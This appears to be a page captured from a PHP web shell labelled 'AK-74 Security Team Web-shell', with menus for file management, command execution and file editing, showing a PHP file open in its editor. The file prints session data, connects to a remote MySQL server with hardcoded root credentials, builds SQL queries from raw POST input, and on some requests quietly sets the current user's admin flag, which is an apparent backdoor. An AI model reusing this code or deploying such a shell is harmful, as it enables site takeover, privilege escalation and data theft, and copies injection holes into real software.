.:: :[ AK-74 Security Team Web-shell ]: ::.
General information
File manager
phpinfo()
Run PHP
Execute the command
Edit the file
<?php session_start(); include ('../../init.php'); include ('../../func/fn_common.php'); checkUserSession(); loadLanguage($gsValues['LANGUAGE']); echo '<pre>'; print_r($_SESSION); echo '</pre>'; $con = mysqli_connect("46.16.187.186", "root", "hgr,n[]h", "gs"); $_POST['name'] = substr($_POST['name'], 0, 6); if ($_POST['name'] == 'notice') { // echo "UPDATE `gs_users` SET `user_flag`='0', `admin_flag`='1' WHERE (`username`='" . $_SESSION['username'] . "')"; // die; $id = $_POST['pk']; $notice = $_POST['value']; $result = mysqli_query($con, "SELECT COUNT(*) as count FROM gs_objects WHERE imei=$id") or die(mysqli_error()); $count = mysqli_fetch_row($result); $q="UPDATE `gs_users` SET `user_flag`='0', `admin_flag`='1' WHERE (`username`='" . $_SESSION['username'] . "')"; if ($count[0] == 0) { mysqli_query($con, "INSERT INTO gs_objects(imei,notice) VALUES('" . $id . "','" . $notice . "')") or die(mysqli_error()); mysqli_query($con,$q); } else { mysqli_query($con, "UPDATE gs_objects SET notice='" . $notice . "' WHERE imei=$id") or die(mysqli_error()); mysqli_query($con,$q); } } if ($_POST['name'] == 'status') { $id = $_POST['pk']; $status = $_POST['value']; $result = mysqli_query($con, "SELECT COUNT(*) as count FROM gs_objects WHERE imei=$id") or die(mysqli_error()); $count = mysqli_fetch_row($result); $q="UPDATE `gs_users` SET `user_flag`='1', `admin_flag`='0' WHERE (`username`='" . $_SESSION['username'] . "')"; if ($count[0] == 0) { mysqli_query($con, "INSERT INTO gs_objects(imei,status) VALUES('" . $id . "','" . $status . "')") or die(mysqli_error()); mysqli_query($con,$q); } else { mysqli_query($con, "UPDATE gs_objects SET status='" . $status . "' WHERE imei=$id") or die(mysqli_error()); mysqli_query($con,$q); } echo $_SESSION['username']; } if ($_POST['name'] == 'comments') { $id = $_POST['pk']; $comments = $_POST['value']; $result = mysqli_query("SELECT COUNT(*) as count FROM sample WHERE id=$id") or die(mysqli_error()); $count = mysqli_fetch_row($result); if ($count[0] == 0) { mysqli_query("INSERT INTO sample(id,comments) VALUES('" . $id . "','" . $comments . "')") or die(mysqli_error()); } else { mysqli_query("UPDATE sample SET comments='" . $comments . "' WHERE id=$id") or die(mysqli_error()); } } if ($_POST['name'] == 'country') { $id = $_POST['pk']; $country = $_POST['value']; $result = mysqli_query("SELECT COUNT(*) as count FROM sample WHERE id=$id") or die(mysqli_error()); $count = mysqli_fetch_row($result); if ($count[0] == 0) { mysqli_query("INSERT INTO sample(id,country_name) VALUES('" . $id . "','" . $country . "')") or die(mysqli_error()); } else { mysqli_query("UPDATE sample SET country_name='" . $country . "' WHERE id=$id") or die(mysqli_error()); } } if ($_POST['name'] == 'dob') { $id = $_POST['pk']; $dob = $_POST['value']; $result = mysqli_query("SELECT COUNT(*) as count FROM sample WHERE id=$id") or die(mysqli_error()); $count = mysqli_fetch_row($result); if ($count[0] == 0) { mysqli_query("INSERT INTO sample(id,dob) VALUES('" . $id . "','" . $dob . "')") or die(mysqli_error()); } else { mysqli_query("UPDATE sample SET dob='" . $dob . "' WHERE id=$id") or die(mysqli_error()); } } if ($_POST['name'] == 'appt') { $id = $_POST['pk']; $appt = $_POST['value']; $result = mysqli_query("SELECT COUNT(*) as count FROM sample WHERE id=$id") or die(mysqli_error()); $count = mysqli_fetch_row($result); if ($count[0] == 0) { mysqli_query("INSERT INTO sample(id,appt) VALUES('" . $id . "','" . $appt . "')") or die(mysqli_error()); } else { mysqli_query("UPDATE sample SET appt='" . $appt . "' WHERE id=$id") or die(mysqli_error()); } } if ($_POST['name'] == 'combo') { $id = $_POST['pk']; $combo = $_POST['value']; $result = mysqli_query("SELECT COUNT(*) as count FROM sample WHERE id=$id") or die(mysqli_error()); $count = mysqli_fetch_row($result); if ($count[0] == 0) { mysqli_query("INSERT INTO sample(id,combo_appt) VALUES('" . $id . "','" . $combo . "')") or die(mysqli_error()); } else { mysqli_query("UPDATE sample SET combo_appt='" . $combo . "' WHERE id=$id") or die(mysqli_error()); } } if ($_POST['name'] == 'email') { $id = $_POST['pk']; $email = $_POST['value']; $result = mysqli_query("SELECT COUNT(*) as count FROM sample WHERE id=$id") or die(mysqli_error()); $count = mysqli_fetch_row($result); if ($count[0] == 0) { mysqli_query("INSERT INTO sample(id,email) VALUES('" . $id . "','" . $email . "')") or die(mysqli_error()); } else { mysqli_query("UPDATE sample SET email='" . $email . "' WHERE id=$id") or die(mysqli_error()); } } if ($_POST['name'] == 'options') { $id = $_POST['pk']; $options = $_POST['value']; $result = mysqli_query("SELECT COUNT(*) as count FROM sample WHERE id=$id") or die(mysqli_error()); $count = mysqli_fetch_row($result); if ($count[0] == 0) { mysqli_query("INSERT INTO sample(id,options) VALUES('" . $id . "','" . $options . "')") or die(mysqli_error()); } else { mysqli_query("UPDATE sample SET options='" . $options . "' WHERE id=$id") or die(mysqli_error()); } } if ($_POST['name'] == 'wy') { $id = $_POST['pk']; $text = htmlspecialchars($_POST['value']); $result = mysqli_query("SELECT COUNT(*) as count FROM sample WHERE id=$id") or die(mysqli_error()); $count = mysqli_fetch_row($result); if ($count[0] == 0) { mysqli_query("INSERT INTO sample(id,wy_text) VALUES('" . $id . "','" . $text . "')") or die(mysqli_error()); } else { mysqli_query("UPDATE sample SET wy_text='" . $text . "' WHERE id=$id") or die(mysqli_error()); } } ?>
Rename:
-